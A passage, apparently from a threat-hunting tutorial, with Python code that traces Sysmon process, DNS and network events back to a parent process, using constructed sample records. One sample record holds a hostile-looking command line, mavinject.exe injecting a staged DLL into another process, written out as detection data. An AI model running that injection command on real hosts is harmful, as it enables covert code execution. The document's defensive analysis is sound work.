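Added example; not from the page or from Sysmon. Field names follow the Sysmon
schema; records, GUID placeholders and addresses are constructed.
"""

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed Sysmon records. {guid-X} stand in for real ProcessGuid values.
SYSMON = [
    {"EventId": 1, "ProcessGuid": "{guid-A}", "Image": PS_EXE, "CommandLine": "powershell.exe -NoProfile",
     "ParentProcessGuid": "{guid-E}", "ParentImage": EXPLORER, "User": r"WS01\Sec504"},
    {"EventId": 22, "ProcessGuid": "{guid-A}", "QueryName": "example.invalid", "QueryResults": "203.0.113.10"},
    {"EventId": 3, "ProcessGuid": "{guid-A}", "Protocol": "tcp", "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventId": 1, "ProcessGuid": "{guid-B}", "Image": r"C:\Windows\System32\mavinject.exe",
     "CommandLine": r'"C:\Windows\System32\mavinject.exe" 4812 C:\Users\Public\stage.dll',
     "ParentProcessGuid": "{guid-A}", "ParentImage": PS_EXE, "User": r"WS01\Sec504"},
    {"EventId": 1, "ProcessGuid": "{guid-C}", "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe",
     "ParentProcessGuid": "{guid-E}", "ParentImage": EXPLORER, "User": r"WS01\Sec504"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1]


def find_processes(events, keyword):
    """Event ID 1 records whose Image or CommandLine contains the keyword (case-insensitive)."""
    kw = keyword.lower()
    return [e for e in events
            if e["EventId"] == 1 and (kw in e["Image"].lower() or kw in e["CommandLine"].lower())]


def activity_for(events, guid):
    """Network connections, DNS queries and child processes attributed to one ProcessGuid."""
    act = {"network": [], "dns": [], "children": []}
    for e in events:
        if e["EventId"] == 3 and e["ProcessGuid"] == guid:
            act["network"].append(f"{e['DestinationIp']}:{e['DestinationPort']}/{e['Protocol']}")
        elif e["EventId"] == 22 and e["ProcessGuid"] == guid:
            act["dns"].append(e["QueryName"])
        elif e["EventId"] == 1 and e.get("ParentProcessGuid") == guid:
            act["children"].append(basename(e["Image"]))
    return act


def connections_by_process(events):
    """The plain Event ID 3 view: destinations grouped by originating image."""
    image_of = {e["ProcessGuid"]: basename(e["Image"]) for e in events if e["EventId"] == 1}
    out = {}
    for e in events:
        if e["EventId"] == 3:
            key = image_of.get(e["ProcessGuid"], e["ProcessGuid"])
            out.setdefault(key, []).append(f"{e['DestinationIp']}:{e['DestinationPort']}/{e['Protocol']}")
    return out


def trace_keyword(events, keyword):
    """For each keyword hit, gather its own activity and its parent's activity."""
    out = []
    for p in find_processes(events, keyword):
        out.append({
            "image": basename(p["Image"]),
            "command_line": p["CommandLine"],
            "user": p["User"],
            "activity": activity_for(events, p["ProcessGuid"]),
            "parent_image": basename(p["ParentImage"]),
            "parent_activity": activity_for(events, p["ParentProcessGuid"]),
        })
    return out


if __name__ == "__main__":
    for t in trace_keyword(SYSMON, "mavinject"):
        print(f"{t['image']} run by {t['user']}: {t['command_line']}")
        print(f"  parent {t['parent_image']}: {t['parent_activity']}")
    print("Event ID 3 by process:", connections_by_process(SYSMON))
```

On the constructed data the `mavinject.exe` hit itself makes no network connection, but pivoting to its parent shows the `powershell.exe` that spawned it resolving `example.invalid` (Event ID 22) and connecting to `203.0.113.10:443` (Event ID 3), which is the chain an analyst wants to see in one place rather than across three separate filters.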
